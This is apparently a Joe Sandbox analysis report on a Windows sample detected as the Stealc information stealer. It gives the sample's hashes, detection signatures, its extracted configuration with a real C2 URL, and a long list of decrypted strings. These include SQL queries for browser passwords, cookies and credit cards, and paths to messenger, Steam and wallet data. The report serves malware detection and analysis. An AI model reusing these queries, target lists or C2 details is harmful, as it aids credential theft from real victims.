Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545325
MD5:9ec79eac864343887ecdf94b7d236918
SHA1:d9eceb6242f24ec369d4b60a78b2c52c1947a5dd
SHA256:29fe5af75f0c521b5bea21d6e5158c96a139269e463b6e8ee1760ed5e1000f44
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9EC79EAC864343887ECDF94B7D236918)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2050733563.0000000005260000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7096JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7096JoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.810000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T12:36:05.671519+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.810000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.file.exe.810000.0.unpackString decryptor: INSERT_KEY_HERE
                Source: 0.2.file.exe.810000.0.unpackString decryptor: 30
                Source: 0.2.file.exe.810000.0.unpackString decryptor: 11
                Source: 0.2.file.exe.810000.0.unpackString decryptor: 20
                Source: 0.2.file.exe.810000.0.unpackString decryptor: 24
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetProcAddress
                Source: 0.2.file.exe.810000.0.unpackString decryptor: LoadLibraryA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: lstrcatA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: OpenEventA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CreateEventA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CloseHandle
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Sleep
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetUserDefaultLangID
                Source: 0.2.file.exe.810000.0.unpackString decryptor: VirtualAllocExNuma
                Source: 0.2.file.exe.810000.0.unpackString decryptor: VirtualFree
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetSystemInfo
                Source: 0.2.file.exe.810000.0.unpackString decryptor: VirtualAlloc
                Source: 0.2.file.exe.810000.0.unpackString decryptor: HeapAlloc
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetComputerNameA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: lstrcpyA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetProcessHeap
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetCurrentProcess
                Source: 0.2.file.exe.810000.0.unpackString decryptor: lstrlenA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: ExitProcess
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GlobalMemoryStatusEx
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetSystemTime
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SystemTimeToFileTime
                Source: 0.2.file.exe.810000.0.unpackString decryptor: advapi32.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: gdi32.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: user32.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: crypt32.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: ntdll.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetUserNameA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CreateDCA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetDeviceCaps
                Source: 0.2.file.exe.810000.0.unpackString decryptor: ReleaseDC
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CryptStringToBinaryA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: sscanf
                Source: 0.2.file.exe.810000.0.unpackString decryptor: VMwareVMware
                Source: 0.2.file.exe.810000.0.unpackString decryptor: HAL9TH
                Source: 0.2.file.exe.810000.0.unpackString decryptor: JohnDoe
                Source: 0.2.file.exe.810000.0.unpackString decryptor: DISPLAY
                Source: 0.2.file.exe.810000.0.unpackString decryptor: %hu/%hu/%hu
                Source: 0.2.file.exe.810000.0.unpackString decryptor: http://185.215.113.206
                Source: 0.2.file.exe.810000.0.unpackString decryptor: bksvnsj
                Source: 0.2.file.exe.810000.0.unpackString decryptor: /6c4adf523b719729.php
                Source: 0.2.file.exe.810000.0.unpackString decryptor: /746f34465cf17784/
                Source: 0.2.file.exe.810000.0.unpackString decryptor: tale
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetEnvironmentVariableA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetFileAttributesA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GlobalLock
                Source: 0.2.file.exe.810000.0.unpackString decryptor: HeapFree
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetFileSize
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GlobalSize
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CreateToolhelp32Snapshot
                Source: 0.2.file.exe.810000.0.unpackString decryptor: IsWow64Process
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Process32Next
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetLocalTime
                Source: 0.2.file.exe.810000.0.unpackString decryptor: FreeLibrary
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetTimeZoneInformation
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetSystemPowerStatus
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetVolumeInformationA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetWindowsDirectoryA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Process32First
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetLocaleInfoA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetUserDefaultLocaleName
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetModuleFileNameA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: DeleteFileA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: FindNextFileA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: LocalFree
                Source: 0.2.file.exe.810000.0.unpackString decryptor: FindClose
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SetEnvironmentVariableA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: LocalAlloc
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetFileSizeEx
                Source: 0.2.file.exe.810000.0.unpackString decryptor: ReadFile
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SetFilePointer
                Source: 0.2.file.exe.810000.0.unpackString decryptor: WriteFile
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CreateFileA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: FindFirstFileA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CopyFileA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: VirtualProtect
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetLastError
                Source: 0.2.file.exe.810000.0.unpackString decryptor: lstrcpynA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: MultiByteToWideChar
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GlobalFree
                Source: 0.2.file.exe.810000.0.unpackString decryptor: WideCharToMultiByte
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GlobalAlloc
                Source: 0.2.file.exe.810000.0.unpackString decryptor: OpenProcess
                Source: 0.2.file.exe.810000.0.unpackString decryptor: TerminateProcess
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetCurrentProcessId
                Source: 0.2.file.exe.810000.0.unpackString decryptor: gdiplus.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: ole32.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: bcrypt.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: wininet.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: shlwapi.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: shell32.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: psapi.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: rstrtmgr.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CreateCompatibleBitmap
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SelectObject
                Source: 0.2.file.exe.810000.0.unpackString decryptor: BitBlt
                Source: 0.2.file.exe.810000.0.unpackString decryptor: DeleteObject
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CreateCompatibleDC
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GdipGetImageEncodersSize
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GdipGetImageEncoders
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GdiplusStartup
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GdiplusShutdown
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GdipSaveImageToStream
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GdipDisposeImage
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GdipFree
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetHGlobalFromStream
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CreateStreamOnHGlobal
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CoUninitialize
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CoInitialize
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CoCreateInstance
                Source: 0.2.file.exe.810000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                Source: 0.2.file.exe.810000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                Source: 0.2.file.exe.810000.0.unpackString decryptor: BCryptDecrypt
                Source: 0.2.file.exe.810000.0.unpackString decryptor: BCryptSetProperty
                Source: 0.2.file.exe.810000.0.unpackString decryptor: BCryptDestroyKey
                Source: 0.2.file.exe.810000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetWindowRect
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetDesktopWindow
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetDC
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CloseWindow
                Source: 0.2.file.exe.810000.0.unpackString decryptor: wsprintfA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: EnumDisplayDevicesA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetKeyboardLayoutList
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CharToOemW
                Source: 0.2.file.exe.810000.0.unpackString decryptor: wsprintfW
                Source: 0.2.file.exe.810000.0.unpackString decryptor: RegQueryValueExA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: RegEnumKeyExA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: RegOpenKeyExA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: RegCloseKey
                Source: 0.2.file.exe.810000.0.unpackString decryptor: RegEnumValueA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CryptBinaryToStringA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CryptUnprotectData
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SHGetFolderPathA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: ShellExecuteExA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: InternetOpenUrlA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: InternetConnectA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: InternetCloseHandle
                Source: 0.2.file.exe.810000.0.unpackString decryptor: InternetOpenA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: HttpSendRequestA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: HttpOpenRequestA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: InternetReadFile
                Source: 0.2.file.exe.810000.0.unpackString decryptor: InternetCrackUrlA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: StrCmpCA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: StrStrA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: StrCmpCW
                Source: 0.2.file.exe.810000.0.unpackString decryptor: PathMatchSpecA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: GetModuleFileNameExA
                Source: 0.2.file.exe.810000.0.unpackString decryptor: RmStartSession
                Source: 0.2.file.exe.810000.0.unpackString decryptor: RmRegisterResources
                Source: 0.2.file.exe.810000.0.unpackString decryptor: RmGetList
                Source: 0.2.file.exe.810000.0.unpackString decryptor: RmEndSession
                Source: 0.2.file.exe.810000.0.unpackString decryptor: sqlite3_open
                Source: 0.2.file.exe.810000.0.unpackString decryptor: sqlite3_prepare_v2
                Source: 0.2.file.exe.810000.0.unpackString decryptor: sqlite3_step
                Source: 0.2.file.exe.810000.0.unpackString decryptor: sqlite3_column_text
                Source: 0.2.file.exe.810000.0.unpackString decryptor: sqlite3_finalize
                Source: 0.2.file.exe.810000.0.unpackString decryptor: sqlite3_close
                Source: 0.2.file.exe.810000.0.unpackString decryptor: sqlite3_column_bytes
                Source: 0.2.file.exe.810000.0.unpackString decryptor: sqlite3_column_blob
                Source: 0.2.file.exe.810000.0.unpackString decryptor: encrypted_key
                Source: 0.2.file.exe.810000.0.unpackString decryptor: PATH
                Source: 0.2.file.exe.810000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: NSS_Init
                Source: 0.2.file.exe.810000.0.unpackString decryptor: NSS_Shutdown
                Source: 0.2.file.exe.810000.0.unpackString decryptor: PK11_GetInternalKeySlot
                Source: 0.2.file.exe.810000.0.unpackString decryptor: PK11_FreeSlot
                Source: 0.2.file.exe.810000.0.unpackString decryptor: PK11_Authenticate
                Source: 0.2.file.exe.810000.0.unpackString decryptor: PK11SDR_Decrypt
                Source: 0.2.file.exe.810000.0.unpackString decryptor: C:\ProgramData\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                Source: 0.2.file.exe.810000.0.unpackString decryptor: browser:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: profile:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: url:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: login:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: password:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Opera
                Source: 0.2.file.exe.810000.0.unpackString decryptor: OperaGX
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Network
                Source: 0.2.file.exe.810000.0.unpackString decryptor: cookies
                Source: 0.2.file.exe.810000.0.unpackString decryptor: .txt
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                Source: 0.2.file.exe.810000.0.unpackString decryptor: TRUE
                Source: 0.2.file.exe.810000.0.unpackString decryptor: FALSE
                Source: 0.2.file.exe.810000.0.unpackString decryptor: autofill
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SELECT name, value FROM autofill
                Source: 0.2.file.exe.810000.0.unpackString decryptor: history
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                Source: 0.2.file.exe.810000.0.unpackString decryptor: cc
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                Source: 0.2.file.exe.810000.0.unpackString decryptor: name:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: month:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: year:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: card:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Cookies
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Login Data
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Web Data
                Source: 0.2.file.exe.810000.0.unpackString decryptor: History
                Source: 0.2.file.exe.810000.0.unpackString decryptor: logins.json
                Source: 0.2.file.exe.810000.0.unpackString decryptor: formSubmitURL
                Source: 0.2.file.exe.810000.0.unpackString decryptor: usernameField
                Source: 0.2.file.exe.810000.0.unpackString decryptor: encryptedUsername
                Source: 0.2.file.exe.810000.0.unpackString decryptor: encryptedPassword
                Source: 0.2.file.exe.810000.0.unpackString decryptor: guid
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                Source: 0.2.file.exe.810000.0.unpackString decryptor: cookies.sqlite
                Source: 0.2.file.exe.810000.0.unpackString decryptor: formhistory.sqlite
                Source: 0.2.file.exe.810000.0.unpackString decryptor: places.sqlite
                Source: 0.2.file.exe.810000.0.unpackString decryptor: plugins
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Local Extension Settings
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Sync Extension Settings
                Source: 0.2.file.exe.810000.0.unpackString decryptor: IndexedDB
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Opera Stable
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Opera GX Stable
                Source: 0.2.file.exe.810000.0.unpackString decryptor: CURRENT
                Source: 0.2.file.exe.810000.0.unpackString decryptor: chrome-extension_
                Source: 0.2.file.exe.810000.0.unpackString decryptor: _0.indexeddb.leveldb
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Local State
                Source: 0.2.file.exe.810000.0.unpackString decryptor: profiles.ini
                Source: 0.2.file.exe.810000.0.unpackString decryptor: chrome
                Source: 0.2.file.exe.810000.0.unpackString decryptor: opera
                Source: 0.2.file.exe.810000.0.unpackString decryptor: firefox
                Source: 0.2.file.exe.810000.0.unpackString decryptor: wallets
                Source: 0.2.file.exe.810000.0.unpackString decryptor: %08lX%04lX%lu
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 0.2.file.exe.810000.0.unpackString decryptor: ProductName
                Source: 0.2.file.exe.810000.0.unpackString decryptor: x32
                Source: 0.2.file.exe.810000.0.unpackString decryptor: x64
                Source: 0.2.file.exe.810000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                Source: 0.2.file.exe.810000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: 0.2.file.exe.810000.0.unpackString decryptor: ProcessorNameString
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: 0.2.file.exe.810000.0.unpackString decryptor: DisplayName
                Source: 0.2.file.exe.810000.0.unpackString decryptor: DisplayVersion
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Network Info:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - IP: IP?
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - Country: ISO?
                Source: 0.2.file.exe.810000.0.unpackString decryptor: System Summary:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - HWID:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - OS:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - Architecture:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - UserName:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - Computer Name:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - Local Time:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - UTC:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - Language:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - Keyboards:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - Laptop:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - Running Path:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - CPU:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - Threads:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - Cores:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - RAM:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - Display Resolution:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: - GPU:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: User Agents:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Installed Apps:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: All Users:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Current User:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Process List:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: system_info.txt
                Source: 0.2.file.exe.810000.0.unpackString decryptor: freebl3.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: mozglue.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: msvcp140.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: nss3.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: softokn3.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: vcruntime140.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: \Temp\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: .exe
                Source: 0.2.file.exe.810000.0.unpackString decryptor: runas
                Source: 0.2.file.exe.810000.0.unpackString decryptor: open
                Source: 0.2.file.exe.810000.0.unpackString decryptor: /c start
                Source: 0.2.file.exe.810000.0.unpackString decryptor: %DESKTOP%
                Source: 0.2.file.exe.810000.0.unpackString decryptor: %APPDATA%
                Source: 0.2.file.exe.810000.0.unpackString decryptor: %LOCALAPPDATA%
                Source: 0.2.file.exe.810000.0.unpackString decryptor: %USERPROFILE%
                Source: 0.2.file.exe.810000.0.unpackString decryptor: %DOCUMENTS%
                Source: 0.2.file.exe.810000.0.unpackString decryptor: %PROGRAMFILES%
                Source: 0.2.file.exe.810000.0.unpackString decryptor: %PROGRAMFILES_86%
                Source: 0.2.file.exe.810000.0.unpackString decryptor: %RECENT%
                Source: 0.2.file.exe.810000.0.unpackString decryptor: *.lnk
                Source: 0.2.file.exe.810000.0.unpackString decryptor: files
                Source: 0.2.file.exe.810000.0.unpackString decryptor: \discord\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                Source: 0.2.file.exe.810000.0.unpackString decryptor: \Local Storage\leveldb
                Source: 0.2.file.exe.810000.0.unpackString decryptor: \Telegram Desktop\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: key_datas
                Source: 0.2.file.exe.810000.0.unpackString decryptor: D877F783D5D3EF8C*
                Source: 0.2.file.exe.810000.0.unpackString decryptor: map*
                Source: 0.2.file.exe.810000.0.unpackString decryptor: A7FDF864FBC10B77*
                Source: 0.2.file.exe.810000.0.unpackString decryptor: A92DAA6EA6F891F2*
                Source: 0.2.file.exe.810000.0.unpackString decryptor: F8806DD0C461824F*
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Telegram
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Tox
                Source: 0.2.file.exe.810000.0.unpackString decryptor: *.tox
                Source: 0.2.file.exe.810000.0.unpackString decryptor: *.ini
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Password
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: 00000001
                Source: 0.2.file.exe.810000.0.unpackString decryptor: 00000002
                Source: 0.2.file.exe.810000.0.unpackString decryptor: 00000003
                Source: 0.2.file.exe.810000.0.unpackString decryptor: 00000004
                Source: 0.2.file.exe.810000.0.unpackString decryptor: \Outlook\accounts.txt
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Pidgin
                Source: 0.2.file.exe.810000.0.unpackString decryptor: \.purple\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: accounts.xml
                Source: 0.2.file.exe.810000.0.unpackString decryptor: dQw4w9WgXcQ
                Source: 0.2.file.exe.810000.0.unpackString decryptor: token:
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Software\Valve\Steam
                Source: 0.2.file.exe.810000.0.unpackString decryptor: SteamPath
                Source: 0.2.file.exe.810000.0.unpackString decryptor: \config\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.810000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.810000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.810000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.810000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.810000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.810000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.810000.0.unpackString decryptor: done
